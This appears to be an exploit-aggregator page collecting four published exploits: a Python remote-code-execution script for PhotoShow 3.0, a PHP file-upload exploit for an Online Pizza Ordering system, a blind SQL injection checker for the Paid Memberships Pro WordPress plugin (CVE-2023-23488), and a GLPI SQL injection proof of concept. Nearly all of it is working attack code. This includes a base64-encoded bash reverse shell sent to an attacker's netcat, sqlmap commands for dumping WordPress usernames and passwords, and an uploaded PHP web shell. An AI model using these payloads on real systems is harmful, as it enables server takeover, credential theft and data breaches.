Latest exploits :: CodePwn

<pre><code># Exploit Title: PhotoShow 3.0 - Remote Code Execution # Date: January 11, 2023 # Exploit Author: LSCP Responsible Disclosure Lab # Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ # Vendor Homepage: https://github.com/thibaud-rohmer # Software Link: https://github.com/thibaud-rohmer/PhotoShow # Version: 3.0 # Tested on: Ubuntu 20.04 LTS # creds of a user with admin privileges required import sys import requests import base64 import urllib.parse if(len(sys.argv)!=6): print('Usage: \n\tpython3 ' + sys.argv[0] + ' "login" ' + '"password" "target_ip" "attacker_ip" "attacker_nc_port"') quit() login=sys.argv[1] password=sys.argv[2] targetIp = sys.argv[3] attackerIp = sys.argv[4] attackerNcPort = sys.argv[5] def main(): session = requests.Session() #login as admin user logInSession(session, targetIp, login, password) #change application behaviour for handling .mp4 video uploadExpoit(session, targetIp, attackerIp, attackerNcPort) #send the shell to attaker's nc by uploading .mp4 video sendMP4Video(session, targetIp) print("Check your netcat") def logInSession(session, targetIp, login, password): session.headers.update({'Content-Type' : "application/x-www-form-urlencoded"}) data = "login="+login+"&password="+password url = "http://"+targetIp+"/?t=Login" response= session.post(url, data=data) phpsessid=response.headers.get("Set-Cookie").split(";")[0] session.headers.update({'Cookie' : phpsessid}) def uploadExpoit(session, targetIp, attackerIp, attackerNcPort): exiftranPathInjection=createInjection(attackerIp, attackerNcPort) url = "http://"+targetIp+"/?t=Adm&a=Set" data = "name=PhotoShow&site_address=&loc=default.ini&user_theme=Default&" \ + "rss=on&max_comments=50&thumbs_size=200&fbappid=&ffmpeg_path=&encode_video=on&"\ + "ffmpeg_option=-threads+4+-vcodec+libx264+-acodec+libfdk_aac&rotate_image=on&"\ + exiftranPathInjection session.post(url, data=data).content.decode('utf8') def createInjection(attakerIp, attackerNcPort): textToEncode = "bash -i >& /dev/tcp/"+attackerIp+"/"+attackerNcPort+" 0>&1" b64Encoded = base64.b64encode(textToEncode.encode("ascii")) strb64 = str(b64Encoded) strb64 = strb64[2:len(strb64)-1] injection = {"exiftran_path":"echo "+ strb64 +" | base64 -d > /tmp/1.sh ;/bin/bash /tmp/1.sh"} return urllib.parse.urlencode(injection) def sendMP4Video(session, targetIp): session.headers.update({'Content-Type' : "multipart/form-data; "\ +"boundary=---------------------------752343701418612422363028651"}) url = "http://"+targetIp+"/?a=Upl" data = """-----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="path"\r \r \r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="inherit"\r \r 1\r -----------------------------752343701418612422363028651\r Content-Disposition: form-data; name="images[]"; filename="a.mp4"\r Content-Type: video/mp4\r \r a\r -----------------------------752343701418612422363028651--\r """ try: session.post(url, data=data, timeout=0.001) except requests.exceptions.ReadTimeout: pass if __name__ =="__main__": main() </code></pre>

<pre><code>## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE ## Author: nu11secur1ty ## Date: 03.30.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html ## Reference: https://portswigger.net/web-security/file-upload ## Description: The malicious user can request an account from the administrator of this system. Then he can use this vulnerability to destroy or get access to all accounts of this system, even more, worst than ever. The malicious user can upload a very dangerous file on this server, and he can execute it via shell. The status is CRITICAL. STATUS: HIGH Vulnerability [+]Exploit: ```mysql <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` [+]Injection_REQUEST: ```POST POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1 Host: pwnedhost7.com Content-Length: 1050 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX Origin: http://pwnedhost7.com Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p Connection: close ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="id" ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="name" ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="description" ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="status" on ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="category_id" 4 ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="price" ------WebKitFormBoundaryt8ceBsdqMkRKDoHX Content-Disposition: form-data; name="img"; filename="namebasterd.php" Content-Type: application/octet-stream <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ------WebKitFormBoundaryt8ceBsdqMkRKDoHX-- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0) ## Proof and Exploit: [href](https://streamable.com/szb9qy) ## Time spend: 00:45:00 </code></pre>

<pre><code>#!/usr/bin/env python # Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection # Exploit Author: r3nt0n # CVE: CVE-2023-23488 # Date: 2023/01/24 # Vulnerability discovered by Joshua Martinelle # Vendor Homepage: https://www.paidmembershipspro.com # Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip # Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9 # Version: < 2.9.8 # Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7 # # Running this script against a WordPress instance with Paid Membership Pro plugin # tells you if the target is vulnerable. # As the SQL injection technique required to exploit it is Time-based blind, instead of # trying to directly exploit the vuln, it will generate the appropriate sqlmap command # to dump the whole database (probably very time-consuming) or specific chose data like # usernames and passwords. # # Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress import sys import requests def get_request(target_url, delay="1"): payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -" data = {'rest_route': '/pmpro/v1/order', 'code': payload} return requests.get(target_url, params=data).elapsed.total_seconds() print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n') if len(sys.argv) != 2: print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py")) print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py")) sys.exit(1) target_url = sys.argv[1] try: print('[-] Testing if the target is vulnerable...') req = requests.get(target_url, timeout=15) except: print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(2) if get_request(target_url, "1") >= get_request(target_url, "2"): print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m')) sys.exit(3) print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m')) print('\n[+] You can dump the whole WordPress database with:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url)) print('\n[+] To dump data from specific tables:') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url)) print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):') print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url)) sys.exit(0) </code></pre>

<pre><code># ADVISORY INFORMATION # Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration) # Date of found: 11 Jun 2022 # Application: GLPI >=10.0.0, < 10.0.3 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/glpi-project/glpi # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE: CVE-2022-31056 # PoC POST /front/change.form.php HTTP/1.1 Host: acme.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156 Content-Length: 4836 Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="id" 0 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_glpi_csrf_token" 752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35 -----------------------------190705055020145329172298897156 Content-Disposition: form-data; name="_actors" {"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]} -----------------------------190705055020145329172298897156-- If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows. POST /ajax/fileupload.php HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841 Content-Length: 559 Origin: http://acme.com Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="name" _uploader_filename -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="showfilesize" 1 -----------------------------102822935214007887302871396841 Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php" Content-Type: application/x-php Output: <?php echo system($_GET['cmd']); ?> -----------------------------102822935214007887302871396841-- # POC URL http://192.168.56.113/files/_tmp/poc.php?cmd= </code></pre>